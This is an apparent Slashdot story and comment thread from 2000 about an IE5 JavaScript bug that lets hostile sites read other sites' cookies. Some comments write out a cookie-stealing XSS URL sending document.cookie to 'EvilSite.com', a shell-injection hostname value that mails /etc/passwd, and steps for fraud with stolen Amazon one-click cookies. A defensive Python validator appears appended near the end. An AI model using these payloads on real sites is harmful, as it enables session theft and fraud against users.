Privacy

MSIE's Cookies Are Public

If you're using Microsoft Internet Explorer on Microsoft Windows, turn off Javascript now. Your cookie file is readable by any hostile website. Or, if you'd like to see the security hole in action, leave Javascript on and check it out: "Open Cookie Jar."

Peacefire webmaster Bennett Haselton is on a roll. After discovering yesterday's Hotmail hole, today he's published his discovery that MSIE's Javascript contains a bug that allows any hostile website to obtain your cookies.

Essentially the bug is that MSIE's Javascript is not very smart about determining which host the page you're looking at came from. Javascript's idea of the document's host comes from its own parse of the URL, and that parser only recognises a literal "/" as the start of the path. If the URL's "/" characters are replaced by their hex escape "%2f" (and "?" by "%3f"), the parser sees no path at all and treats everything up to the final slash as one very long machine name, while the request itself still goes to the real server. Because the cookie-domain check is then made against that bogus hostname, a well-placed ".yahoo.com" at the end of the URL makes Javascript think the page belongs to Yahoo, so document.cookie hands over Yahoo's cookies - and the script can be told to deliver those cookies back to the hostile server, for instance by appending them to a URL it loads.

Bennett and I believe the bug is confined to the Javascript code in MSIE, but we have not done extensive testing to determine this. For now, at least, we believe turning off Javascript will be sufficient to eliminate this security hole.

Or, you could migrate to another browser or operating system...

We have only tested this with IE 5 on Windows 95/98. Reports of success or failure with other versions would be welcome.

After Bennett explained to me how this works, I wrote a short CGI script to demonstrate what lurks in cookie files. Instead of silently stealing your private information and squirreling it away for later use, it echoes that information back to you (and then forgets it, of course). Updated: That script has been rewritten and is now hosted at securityspace.com. For best results, first log into amazon.com, type your zip code into hollywood.com, and visit playboy.com. Then go to securityspace's general info page and click the "click here."

Newsbytes and CNET have picked up this story and have good writeups.

Comments:
  • In the face of a government ordered breakup of Microsoft due to anti-competitive measures, Microsoft is doing it again. Microsoft has released the Internet Explorer 5.5 beta recently in order to solicit feedback. One of the new features in IE 5.5 is the integration of the MSN Messenger Service and Outlook Express. There doesn't seem to be a way to turn it off or to replace it with a competing Messaging Service such as ICQ or the AOL Instant Messaging service. I think we should give them some feedback.
  • IE 5.5 beta on win2k doesn't fix anything - it still works fine.
  • Therefore if I can steal the session ID for, let's say, Amazon I could send you $20,000 worth of books as a joke. That is not funny.

    Of course it's funny.. you could use that _stupid_ "1 click shopping" with someone else's ID.. It'll be easy, fast, _and_ funny..

    (of course, I think it's funny because I use Netscape..)

    --

  • by pod ( 1103 )
    Ditto for IE4 on NT4 (all patched up).
  • > what is M$ bashing FUD and what is a valid opinion?

    What really matters is, how long until a fix is out, and what other problems will the fix introduce?

    --
  • The first thing I did to test this was to log into Slashdot with IE (I don't use IE, but it's there) and check out my /. cookie, and I noticed that the user number is stored in plaintext (look harder, it's there), so in theory one could change it and troll with someone's karma!

    Haven't tried this though.
  • A quick update: I did a "cut and paste" of the statement made by peacefire.org here on Slashdot and have sent it on to Microsoft's Security team as a high-priority mail message.
  • This bug has been known for at least a year and a half. Check this [ox.ac.uk] out.


  • A post on the NTBugTraq list calls this story a "hoax". Perhaps that's overstating it, but it's a good example of the danger of jumping to conclusions.

    The poster says that the demonstration script uses document.write to display the contents of a cookie in the browser window. Nowhere is it explained how the information might be transmitted back to the server.

    I haven't investigated the code myself, just passing along the comments of others.
  • Mail it to your hotmail account. It will be perfectly safe there.


    ---
  • you're forgetting about "gift shipments".

    step 1: get person's cookie file
    step 2: sign onto ecommerce service as person
    step 3: change the person's default email address with the service to a hotmail account (so they won't notice the "item has been shipped" thing)
    step 4: mail something, as a "gift", to a P.O. box. they will let you do this.

    If you get lucky no one will notice. Scarily enough, this would work.
  • I also posted something on that article that got lost in the shuffle: a link to an old slashdot article [slashdot.org] about a CERT advisory [cert.org]. Among other things, the advisory asked webmasters to escape/reject all html coming from site users, even if only that one user sees the content.

    Open-source webserver Apache fixed [apache.org] its 404 not found page to escape the name of the URL, but most dynamic websites still haven't fixed all of their code.

    Coincidentally, I had just been reporting a bunch [mozilla.org] of bugs about bugzilla [mozilla.org] (mozilla [mozilla.org]'s bug-tracking system) not being careful with untrusted data when these slashdot articles came up. I'm actually more worried about attacks against mozilla's CVS system than against its bug-tracking system, but I haven't looked for bugs there yet.

    --

  • Umh... if you are running arbitrary javascript that can display the cookie, then it doesn't take any genius to figure out how to send it somewhere! Like... load a URL on the attacker's server (or a free throwaway account) containing the value of the cookie.
  • Microsoft's style of inventing, copyrights, market domination, "care" for customers and all the other nice stories they give us would be a good manuscript for making one of these bad Hollywood movies about the internet, hackers and big bad companies and all the other "scary things" they are having in these movies. At least this movie will have some relevance, because it has really happened.

    In 10 years everyone will be laughing at Microsoft's infantile, stupid inventions and copyrights.

    With so many bugs, security holes and stupid copyrights, Microsoft is making fools of themselves. How much can IT managers take before they turn to someone else? If that happens /. users can start doing something more useful than complaining about software they are not using (ARE YOU???), more than they have to. Maybe it won't be that amusing though...

  • If this is occurring even on Apache, then we may have a MAJOR security problem here.

    This could indicate that Javascript (or ECMA-242 script as it's sometimes known) in general can cause a security leak. They better start testing this on Netscape Navigator 3.x and all Netscape Communicator versions NOW to see if Netscape is also vulnerable to this bug.
  • Sure, maybe it will work on some sites. But that is due to other holes that they have. Try it on amazon.com. You won't get far, since they require you enter your password to do that.
  • Here's how...

    1. Write book (something catchy and trendy, e.g. "What's good for MS is good for America").

    2. Build a website to promote your book.

    3. Scan for BN and Amazon cookies from those who visit your site.

    4. Build a LWP Perl script and batch order copies of your book to those fools who visit your site with cookies enabled.

    5. Collect your royalties and move offshore.

  • I am not an advocate for MSIE, or even Netscape; both browsers suck...
    However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail and Amazon (one-click shop) wouldn't even work without the damn cookies?

    I am sick of cookie bashers, however. Busting out all kinds of hysteria and privacy garbage. There is a bad side to every method. Including secure transactions. Why not just say it like it is for a lot of crucial technologies on the net? Why not state: "Did you know that every time you do a secure transaction you run a risk of a third party listening and taking your credit card number?" How about we just do a loud campaign that preaches to the world that their pocketbook can be stolen if they use the web! Let's really shoot our foot, boys!

    If everyone knew just how unsafe secure transactions are on the net, we would all be in a lot of trouble, and possibly out of work in the long run.

    Nothing is fail-proof, or impossible to breach in our web medium... You should all know that by now.

    Keep in mind, as a developer, sometimes there is only one way to go for a solution. Technology will change and maybe get better but it won't ever stop the real "hardcore coder". Politics are at large and for now the powers that be are actually in our favor. So let's try and be "nice" about what we do and say within our medium.

    The Alienx
  • your sarcasm detector seems to be on the fritz...
  • A truck-sized security hole in a Microsoft product? I won't believe that until I see it. Oh, wait...

    -Legion

  • Please remove this exploit of Microsoft from slashdot, Microsoft would rather only let the dangerous criminals know of this, and not their general user base....
    :)

  • That's because you installed the Outlook fix after the Melissa virus came out. You do NOT have a default install of Outlook

    This is not relevant to anything. If you built Slackware when it first appeared, and never installed any patches since then, then
    1 - you have a 'default install of Slackware', and
    2 - you've got more vulnerabilities than you've had hot dinners.

    Failure to patch is not a failure of a given OS, it's a PEBCAK.

    Go to www.microsoft.com, click on Subscribe from the blue bar near the top, and subscribe to the alerting services.

    MS is far from perfect, but failure to automagically patch exploits that don't yet exist is not a valid line of attack against anyone

    TomV

  • someone could steal your slashdot.org cookie and wipe out all your karma by troll posting! :)
  • I just tried the test with IE 5 for Solaris

    I didn't know there was an IE 5 for Solaris - is it better than IE3 for Solaris was?
  • It's people like you that spoil perfectly good software patents for the rest of us! You outta be ashamed of yourself!

    =P

  • I have tried the demo by Jamie (go to Hollywood, etc.) and then a window opens with many frames. All contain "ERROR 205 -- DNS name lookup failure. Please contact your system administrator." from the proxy but for http://www.securityspace.com%2fexploit%2fexploit_1e.html%3fa=.hollywood.com/ [hollywood.com] that has a Hollywood.com window saying "That user doesn't exist".

    When I tried the box and button on Security Space [securityspace.com], I get "www.slashdot.org's cookie is:".

    I run IE 4.0 in NT and have Junkbuster set to allow cookies only to sites I trust.
    I also have a company proxy to access the web.

    __
  • I can see this happening sooner or later.

    Just watch out, because in the distant future, you may bite down on a cookie and find a worm...

  • I just tested this with Windows 2000 running IE5. I saw my cookies from many web sites in a split second. This is sorta scary, but I'm really not so worried about it that I'll turn off javascript. If I did turn off javascript, it would break many sites that I frequent.

    Sure, there could be some malicious code to steal cookies from me, but the chances are extremely small. First, the attacker would have to know what sites I have cookies from on my computer. Even if it did find those cookies, what is the worst it could do? Steal your hotmail account? (I'm sure they couldn't do THAT already). If you use cookies to keep track of really sensitive data, then it's your own damn fault.

    So, I'm not turning off javascript, and I'm sure MS will release some patch in a few days fixing this 'feature' of windows and ie.

    -Mike Bell
  • The "hidden" troll forum is currently up to about post #2100, and all of them are genuine posts rather than bot-generated. So you still come in second with about 800 posts :)

  • Are you Bob Gobman of Anytown, USA? I'm John Smith! I live down on Peppermint Lane. We ought to get together some time for a phosphate.
  • I haven't tried but I guess that it doesn't allow untrusted sites access to cookies. But what if a trusted site uses this exploit to access cookies from another trusted site?

    I am confused.
    __
  • Typing this URL
    http://somewhere.com/%2ftest.php3?q=8
    replaces the %2f with a / on my apache server. That's all. I guess there is a problem with your apache configuration. Since you seem to be called Jonathan Clark and the URL apache returns for you contains /jc/, I guess that you have configured apache to go to your jc directory when the URL http://somewhere.com// is used. Just a guess.

  • by MrP- ( 45616 )
    it has been out for a while too..

    Internet Explorer 5 for Solaris with Outlook Express [microsoft.com]

    Internet Explorer 5 for HP-UX with Outlook Express [microsoft.com]

    Internet Explorer 4.01 for Solaris with Outlook Express [microsoft.com]

    Internet Explorer 4.01 for HP-UX with Outlook Express [microsoft.com]

    #----------------------------
    $mrp=~s/mrp/elite god/g;
  • Instead of wasting threads on dumb comments...

    For those of you who are posting this is a hoax, think about it. Yes the peacefire site just displays the cookie information, but this can also be sent to a server.

    So basically, instead of printing out document.cookie you can add it to a URL like 'http://www.blah.com/foo.pl?data=' + document.cookie and then have javascript forward to that URL, and tada, now you have submitted your cookie data to someone's perl script, which can then save it to a file, email it to the author, etc.. so it is not a hoax

    #----------------------------
    $mrp=~s/mrp/elite god/g;
  • I would quit my job immediately if my employer installed filtering software. For God's sake, why would an employer want to forbid their employees from educating themselves?

    It's mostly to stop the idiots in sales from surfing for pr0n.
  • by finkployd ( 12902 ) on Thursday May 11, 2000 @08:27AM (#1077982) Homepage
    Revealing proprietary, trade secrets on a public web site? Let's face it, this is MS, there is no way this is a security hole, they are too "innovative" for that kind of sloppy work to get through. This must be a special "enhancement" they made to the way javascript works, and as such, is covered under the DMCA.

    I'll bet it's another letter for you guys :)

    Finkployd

  • ... whether peacefire.org is going to get threatened by Microsoft under the DMCA for releasing these "trade secrets" ?

    OK, here ends the simple "anti-MS" part of the post (fun though it was for me). Please, folks, let's just look at this as simply a data point and a public-service announcement. Yes, it's a hole in IE; it's a safe bet that every significant piece of software's got holes.

    Let's see how fast MS is able to get a patch out; this one's big enough for them to really worry.

  • ROTFLMAO

    OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'

    It makes the Internet all that much closer to you, as well as your machine:in both directions.

    Well, maybe the above thought is incorrect.

    Anyway, I'm thinking something blasphemous. M$ complains that splitting it up will hinder its ability to 'innovate' and 'compete'. Isn't that the point? If M$ can't expect to release a decent Office or X-Box or IE without access to the OS group, how is Netscape, or Corel, or anyone else expected to 'innovate' and 'compete' if M$ cannot?

    There are people complaining about how breaking up M$ is bad, but I'm wondering, if M$ restructures itself in such a way that the OS department can still freely communicate with the Apps department, but in a way that is public and open, doesn't *everyone* win?

    -AS
  • I am just trying to think of how Mico$oft marketing will try to explain this as a feature....
  • Ahem..Crash Me [slashdot.org], Melissa, ILoveYou, Hotmail, now this. Leave it to Microsoft to bring innovative new ways to lose all sense of privacy. Seriously though, maybe this is an artifact of M$ getting too big? I am a pretty forgiving guy, but they are making too many mistakes for even me to overlook.

    Maybe a breakup is a good thing. It's about time that Microsoft re-discovers the meaning of the words pride.. integrity.. fun.. innovation.. excellence. Instead of their usual fare which consists of market capitalization, share value, PR, equity.

    Microsoft has a lot of good people working for them, and I have had the pleasure of working with some of them. Too bad the company's sense of responsibility and integrity is off smoking a $3 sack of crack.

    My humble opinion.....
    -Nathan

  • by consumer ( 9588 ) on Thursday May 11, 2000 @09:57AM (#1077993)
    Anyone with a packet sniffer can see your cookies. They are not normally encrypted. Web developers should not be putting sensitive information in cookies or using cookies as the only verification needed for secure tasks, like on-line purchases. Sites like Yahoo are very careful to require a password before letting you edit sensitive data, even if you have a cookie.

    With a policy like that, it really doesn't matter if the entire world looks at your cookies.
  • What about Intranets? Companies are using these for a lot of things now, including sensitive strategic and HR data.

    Now anytime a boss visits a hostile web site, he may be giving away the keys to the company's proprietary data. Even if personal web sharing is not allowed, a hostile employee and an outside confederate could easily stir up a lot of trouble.

  • Test your for your Slash Dot Cookie [slashdot.org]

    Mine was chocolate chip. Mmmmm
  • So anyone can read the document and create an implementation without Microsoft's permission now? They don't have to illegally copy the document or anything. I'm curious to know how the situation stands right now.

  • However, be sure to note that the only reason this stops this particular exploit is because the page is coded to check for the browser. If it wasn't, then simply sending a different User-Agent would be no protection at all.
  • Right. And it has this in the license:
    ...Microsoft grants to you the following...to reproduce and use a reasonable number of copies of the Specification in its entirety for the sole purpose of reviewing the Specification for security analysis...

    Doesn't posting on Slashdot count as this????

  • That beats mine by a longshot. BTW, do you have any references so we know that you didn't keep our passwords? You da man.

    numb
  • by drwiii ( 434 ) on Thursday May 11, 2000 @10:06AM (#1078022)
    I can do that [min.net] with Netscape too.
  • The difference is that anyone (skilled enough) can fix linux problems. Only Microsoft can fix MS problems - if/when they get around to it.

    Besides, bashing M$ is fun. Bashing the under-dog would be seen as cruel!
  • by Erv Walter ( 474 ) on Thursday May 11, 2000 @10:14AM (#1078025) Homepage
    Actually the article just says that you can't get to credit card info or other account maintenance things because you are asked to type a password. This is correct. However, if the user has set up one-click on the computer you stole the cookies from, you probably can one-click order stuff. There is no password required for one-click (just "one click"). It's all based on cookies. Of course, whatever you order will be shipped to the victim and not to you, but you'll still run up their credit card bill :(
  • So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"

    Well, yeah, but all the stuff will go to the poor sap whose cookies you stole. Hey, you could order him lots of pr0nography and stuff--let 'im explain that to his significant other.

    unDees

  • Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED. That's why they are guarded so viciously.

    So it's no longer a trade secret. It's still a copyrighted document and is still protected as such.

  • er.. the /jc/ was a typo on my part - it shouldn't be there.

    As the other poster commented this isn't really a problem with apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to apache in the request header. What I thought was interesting is the fact that apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.

    For example if the unescaped hostname looks like this:

    somewhere.com;`mail s@s.com /etc/passwd`

    and some CGI script does something like this:

    nslookup $HOSTNAME

    you've got a big problem!

  • It posts, but anonymously.

    Rule of thumb: if you want security or privacy, do not use a Microsoft product.

    --
  • ...writing the PHP script so that it makes people's browsers post the following:

    ===================

    Subject: Can You Imagine...
    Body:

    ...a Beowulf Cluster of these?

    Thank you.


    ===================

    You would have earned a place in the annals of Slashdot history.

    Take care,

    Steve



    ========
    Stephen C. VanDahm
  • The default installation does not touch cookies, but it does have some wicked javascript filters. Sure, I get "errors", but I also avoid rollovers, popups and other annoying javascript cluelessness.

    It's totally configurable, you can design any filters you want - but I'm so happy with the default that I just leave it at that. (particularly I like the agent and referer masking.)

  • ...exactly what pod says above. However, since I started this before I saw his/her reply, I'll go ahead and post this as well. ;^) Go to the /. search box at the bottom of this page and type:
    [script]alert("Hi mom!")[/script]
    except use angle brackets instead of square brackets.

    Since search.pl echoes what you type in "Searching blahblahblah" without stripping the JavaScript, you'll get an alertbox when you view the page.

    drwiii's page works like that. That page redirects to something like this URL:

    http://slashdot.org/search.pl?query=[script]location.href = "http://EvilSite.com/cgi-bin/getcookies.pl?data=" + document.cookie;[/script]
    (Actually, the "+" and perhaps the ";" would need to be changed to "%2B" and "%3B" in the URL.) EvilSite's CGI script receives /.'s cookie (in easy-to-parse, semicolon-separated name=value pairs) because the script was actually run from a /. page. (I truly don't mean to say that drwiii is evil in any way.)

    Originally, drwiii's script used /.'s 404 page, which was optimized for people who accidentally made links like this [slashdot.org]. That loophole got closed after the server move.
    --
    New empires...began ebbing and flowing all over the place like Moon Pies on a hot sidewalk.

  • by G27 Radio ( 78394 ) on Thursday May 11, 2000 @12:36PM (#1078047)
    You would have earned a place in the annals of Slashdot history.

    That's OK. I now have the most active user-created sid in Slashdot history :)

    numb
  • I think your post is a bunch of mindless ranting and highly overrated. I don't usually jump to Microsoft's defense but there is no way your post deserved a 5.

    First of all, to the cookie issue: turn off Javascript, OR go into the security settings and disable cookies that are stored on your computer. OR wait a brief moment and Microsoft will have a patch out. OR use any number of 3rd party cookie filtering programs that are out there. Personally I think neither Netscape, nor IE provide sufficient cookie control and management capabilities.

    Also, let's keep some perspective and remember that both IE and Netscape have had vulnerabilities uncovered. They both make mistakes, they both fix them. Let's move on.

    As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't.

    I DO think Microsoft should not allow their script language to poke through your address book. Newbie computer users would be less likely to trust this type of trojan if it wasn't a friend of theirs in the From: field.

    The rest of your rant about the trade secrets and UCITA is nothing more than mindless Slashdot karma whoring. *yawn*

    Best regards,

    SEAL
  • I can't help but think - what if someone grabs my cookie file and mails it to my mother? This is the worst thing to happen since the "History" list in the browsers ...

    ahhhhhhhhck.

    The real security blunder here is sites storing sensitive information in cookies. Idiot moves by microsoft should be anticipated, and _no_ sensitive information should be stored in cookies.

    makes you wonder how long microsoft has been collecting cookies from other web sites ;)

    g
  • A bit offtopic...

    While I don't run Windows or IE, I'm a security-conscious geek, and I'd like to warn my friends and co-workers about this exploit. But my employer of the moment, in order to protect us from evil content, has installed CyberPatrol. As you may know, the fine folks at Peacefire have been having a field day by pointing out the foolishness of censorship programs, and the makers of censorware have (at least in the case of CyberPatrol) responded by adding Peacefire to their blocklists.

    So, all you companies with CyberPatrol installed - your censorship has just made it more difficult for your employees to be informed about a serious security hole.

    Think of it as evolution in action.

  • by EricWright ( 16803 ) on Thursday May 11, 2000 @11:19AM (#1078056) Journal
    Did you get a copy of the ILOVEYOU email or attachment? Did you look at the source code? I did. I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING! It was a Visual Basic script. Those don't do anything by themselves. I have a copy of it on my HD, and all my jpgs and mp3s are just fine...

    Go read the article you posted the link to. All references to ILOVEYOU are *COMPARISONS*.

    They quite clearly state: "Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT..... This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus." They make no claims about ILOVEYOU spreading in this manner. They simply use the havoc-level of ILOVEYOU as a baseline for destructiveness.

    The virus they are referring to in this case is the Kak virus.

    Eric
  • by GNUs-Not-Good ( 130016 ) on Thursday May 11, 2000 @11:24AM (#1078059)
    put the Kerberos spec from MS in my cookie file.

    That way they will be responsible for distributing their own trade secrets through their own security holes.

    Then, they can sue themselves.
  • Couldn't someone write a script to, instead of outputting the cookies to a local page, add 'em to a URL like www.foo.com/blah.pl?data=COOKIE_INFORMATION_HERE ..... and then that script can email the cookie data to the author of the javascript... if so this is what to worry about

    #----------------------------
    $mrp=~s/mrp/elite god/g;
  • The default installation of Proxomitron [cjb.net] disables this exploit without sacrificing the Javascript functionality needed to enjoy the majority of sites. Cool.
  • Quoth the poster:
    However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail and Amazon (one-click shop) wouldn't even work without the damn cookies?
    Yet another reason I don't use Amazon.com anymore. Sites that use cookies need to be explicit about why and how, and then the user could (grudgingly) allow certain ones, from trusted sites, to be set. I complained not long ago to staples.com, and actually received a response indicating that the privacy concerns are forcing them to re-think their requirement of cookies. Maybe there's more hostility than we thought...

    Also quoth the poster:

    There is a bad side to every method. Including secure transactions.
    But you can choose methods that minimize the "bad side" and make it hard to exploit, rather than (as here) relatively easy.

    And yet more from the poster:

    If every one knew just how unsafe secure transactions are on the net, we would all be in alot of trouble, and possibly out of work in the long run.
    Does your personal code of ethics really say that you should keep quiet about known dangers because it might affect your earning potential? How ruthlessly pragmatic! Or... we can raise a ruckus over these sorts of too-simple exploits and, through the glare of publicity, perhaps encourage the people involved to design better products.
  • Quoth the poster:
    Take for example the recent love bug. One came out then 20 more were made over night. Maybe many more would have been made if we went and put the source code on a highly visible site.
    Or maybe, if the Outlook code were open-sourced, overnight a fix and patch would have been developed and distributed... in fact, if the Outlook code were open-sourced, maybe the bug would have been found and fixed before it allowed hundreds of millions of dollars to be lost to productivity shutdowns...
  • You could, you know, tell us when you find a hole, so we could, you know, plug it up and stuff.
  • After what I've seen today, I'm not about to click on that.

    numb
  • Ouch! I guess I'll have to take a hard look at my cookies file, to see who else stores my password in the cookie.

    Hey, /., there is no need at all to store my password in the cookie. A random number, stored in my user record, will work just as well, and (even better) /. can change it periodically -- thus, any replay attacks stop working after a day or so.

    Please fix that. Now. Thank you.

  • What I find interesting is that this bug doesn't appear in the http header support for cookies. This means the http header group and the JavaScript group used different approaches and code to the same problem.

    Why is that interesting? Because MS is arguing that consumers need MS to remain one company so the OS side and software side can work close together and provide us with more powerful software, and breaking them up would stifle "innovations" in future products - resulting in less powerful and less user-friendly tools for consumers.

    MS expects people to believe that, when they can't even effectively share algorithms, programming procedures, and code within the same software product?

    MS = BS;

  • by Camel Pilot ( 78781 ) on Thursday May 11, 2000 @11:27AM (#1078090) Homepage Journal
    As was pointed out, a lot of sites use cookies to maintain session. Therefore if I can steal the session ID for, let's say, Amazon I could send you $20,000 worth of books as a joke. That is not funny.

    This hole depreciates the value of "Netscape" cookies which is a nice way to maintain session with a connectionless protocol.
  • ROTFLMAO. OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'.

    If you really want to die of laughter, check out Time's latest piece [time.com], which includes a "viewpoint" by Mr. Gates, defending the very integration you speak of.

    My personal favorite from Gates: "Updates to Windows and Office technologies that could, for example, protect against attacks such as the Love Bug virus would also be much harder for computer users to obtain."

    43rd Law of Computing: Anything that can go wr
  • by Sasquach ( 144074 ) on Thursday May 11, 2000 @08:40AM (#1078098)
    Oh GOSH. Now they have the fake name/address/e-mail I always put on stupid registrations. So let Bob Gobman at 1 Happy St. get all the junk mail destined for me. And let the unfortunate fellow whose e-mail is bob@bob.bob get all the spam destined for me.

    Is it just me or do people find reasons to get all up in arms for nothing? For all of you who will respond that this is a big deal, remember your name/address AND phone number are all available in your local phone book. And if you are THAT paranoid about common public information, then DON'T POST YOUR REAL DATA!!!
  • This can't be true. The man who sold me my computer said that Windows 2000 would make surfing the internet safer and faster than ever before. He also said that using the email with Windows 2000 would be safe. First the lovebug and now cookie thieves! I think you people just make this stuff up.

  • I am shocked. This is pathetic.

    If I were the Justice Department (or United Nations, or DoD, or CIA, or FBI, or ANYONE who gave a damn about security) I would be seriously considering if Microsoft products have any place on my desk, in my office or in my life. The open cookie jar isn't so much what bothers me, but this is the straw that breaks this camel's back.

    Microsoft's attitude toward security and toward the end user in general is atrocious. I don't really care what you think, but it IS Microsoft's fault that the default install of Windows 98 using the default mail client simply by reading the ILOVEYOU message will be rendered useless. Now this???? I mean COME ON!

    Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED. That's why they are guarded so viciously.

    Oh, and another thing which is completely offtopic: I think that the UCTIA, Section 307, Subsection 2(e) invalidates the GPL!!! It is a description of what kinds of software licenses are valid. It reads "(e) Neither party is entitled to receive copies of source code, schematics, master copy, design material, or other information used by the other party in creating, developing, or implementing the information."
    This would seem to mean that no one needs return code as the GPL demands. What do you guys think???

  • by G27 Radio ( 78394 ) on Thursday May 11, 2000 @08:58AM (#1078102)
    I mentioned this yesterday in the Hotmail thread but it kinda got lost in the shuffle. Slashdot should post an article about the "client-side trojans" discussion that is going on at Zope. Slashdot isn't the only site affected by this--and it's a simple hack:

    WARNING: Clicking this link will cause an article to be posted on Slashdot in your name [sourceforge.net]

    Obviously such a link wouldn't need to warn you what it does, or post such an innocuous message. Maybe I could make it post your slashdot cookies too :)

    You can see the results in sid=numb [slashdot.org] and there is a link to the source in there too.

    numb
  • I noticed this exploit causes problems with Apache as well. This could possibly cause a security hole somewhere:

    when I specify a URL like this:

    http://www.somewhere.com/test.php3?q=8

    apache correctly reports:

    "Host: www.somewhere.com"

    but when I specify a URL like this:

    http://www.somewhere.com%2ftest.php3%3fq=8

    apache reports:

    "Host: www.somewhere.com/jc/test.php3?q=8"

    This means apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.

    But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.

  • by xDroid ( 115379 ) on Thursday May 11, 2000 @09:02AM (#1078111) Homepage

    HowTo turn-off scripting holes in outlook/IE.
    ------------------------------------------
    In outlook/IE,

    tools -> options -> Security -> Zone settings -> Custom level ->

    under the scripting section disable
    Active scripting,
    Allow Paste operations, and
    Scripting of Java applets.

    Press ok till you are back in outlook/IE.

    Then you will not be at risk for a copy-cat ILOVEYOU virus or IE cookie monsters.

    (Of course you all probably did this the first day you opened outlook, right.)
    ------------------------------------------

    PS --
    Here is a very nice solution to the .vbs email attachment problem.
    (add .txt to the attachment making it a text file)
    I'm not sure how to implement this in Exchange, though.
    (from Rick Johnson off the saclug.org mailing list)

    -- Andy

  • by MoxCamel ( 20484 ) on Thursday May 11, 2000 @09:04AM (#1078113)
    So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"?
  • by mr_death ( 106532 ) on Thursday May 11, 2000 @11:06AM (#1078121)
    Just ran a test with my own amazon account. With 1-click turned on in a previous session:

    1. with my cookies, 1-click enabled.

    2. close browser, remove amazon cookies.

    3. open browser, amazon asks me to log in; no 1-click

    4. close browser, put amazon cookies back

    5. open browser, amazon recognizes me, 1-click enabled, no password required.

    Another reason to turn off 1-click. If you don't, you might find a weird set of books on your doorstep, and one maxed-out credit card.

  • And if you want to still use Javascript at certain sites but not promiscuously ;) get IE power toys (tools) at the microsoft web site and set up the internet zone as the other people have said and set the trusted zone to allow javascript (since some sites won't work at all without javascript).

    The power tools allow you to switch a site into the trusted zone just by clicking

    Tools>Add to Trusted zone

    and you can delete the site from your trusted list in the usual manner (Tools>InternetOptions...>security>trusted sites remove)

    This makes it easier to allow cookies at Slashdot and not at Joe Website who hates all people and will screw them over any chance he gets.
  • by thechink ( 182419 ) on Thursday May 11, 2000 @11:08AM (#1078127)
    HowTo turn-off scripting holes in outlook/IE.

    Sorry but this does not stop the ILUVYOU virus. What you suggest disables scripts in HTML formatted email and that does stop viruses like Bubbleboy for example. It DOES NOT stop scripts sent as email attachments (ala ILUVYOU, Melissa etc) BIG DIFFERENCE. Many people seem to be having trouble understanding this. Scripts in HTML email are run by the IE script engine and are controlled by the settings in Internet Options. These are the kind of scripts that can run in the preview pane automatically. Email attachment scripts are run by the Windows Scripting Host and are run outside of Outlook (or any other emailer) and have to be run by the user. The way to fix this problem is to either remove the WSH or change the default association for VBS and JS script files.
  • by Marc Slemko ( 6200 ) on Thursday May 11, 2000 @11:42AM (#1078135)
    I reported a similar bug to Microsoft on March 19th. My particular example was a URL in the form "http://10.0.0.1%20.msn.com/foo.html" which causes IE to load content from 10.0.0.1 but the Javascript code thinks it is .msn.com; this is a symptom of either the same problem or a very similar one.

    However, they took their time to deal with it. I did not pressure them on it since I had more important things to worry about.
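
Both the Apache observation above (`www.somewhere.com%2ftest.php3%3fq=8` arriving as the whole `Host:` value) and Marc Slemko's `10.0.0.1%20.msn.com` case come down to the same parsing discipline: the authority must be cut off at the first literal `/`, `?` or `#` before any percent-decoding, and then validated as a hostname before it is ever compared with a cookie domain. The following is an added example, not IE's, Apache's or Peacefire's code; the lenient check is a constructed contrast of the behaviour the posts describe, not Microsoft's actual implementation, and `extract_host`, `domain_matches` and the regular expression are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed example, not IE's or Apache's code. It contrasts a lenient host
# check with a strict one on the URL shapes quoted in the two posts above.

# RFC 1123 hostname grammar: labels of letters, digits and hyphens joined by
# dots. Nothing else (no '%', no space) may appear in a host.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$")


def extract_host(url):
    """Split the authority off on the literal '/', '?' and '#' before any
    percent-decoding, then validate it. Returns None for anything that is
    not a syntactically valid hostname."""
    host = urlsplit(url).hostname      # lower-cased; userinfo and port stripped
    if host is None or not HOSTNAME_RE.fullmatch(host):
        return None
    return host


def domain_matches(host, cookie_domain):
    """Netscape-style cookie domain match: the host equals the domain or is a
    subdomain of it, compared at a label boundary (no bare suffix matching)."""
    if host is None:
        return False
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)


def cookies_readable_from(url, cookie_domain):
    """Strict check: a valid host first, then the label-wise domain comparison."""
    return domain_matches(extract_host(url), cookie_domain)


def lenient_cookie_check(url, cookie_domain):
    """The kind of check the posts suggest was in effect: take whatever sits
    between '://' and the first literal '/' as the host, skip validation, and
    suffix-match the cookie domain. A constructed contrast, not IE's code."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    return authority.lower().endswith(cookie_domain.lower())
```

Run on the two URLs from the posts, `extract_host` returns `None` for both, so the strict path never reaches the cookie comparison at all; the lenient check, by contrast, accepts `10.0.0.1%20.msn.com` as belonging to `.msn.com` because it only looks at the suffix. Rejecting a malformed authority outright is also what a server should do before using it for virtual-host selection.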
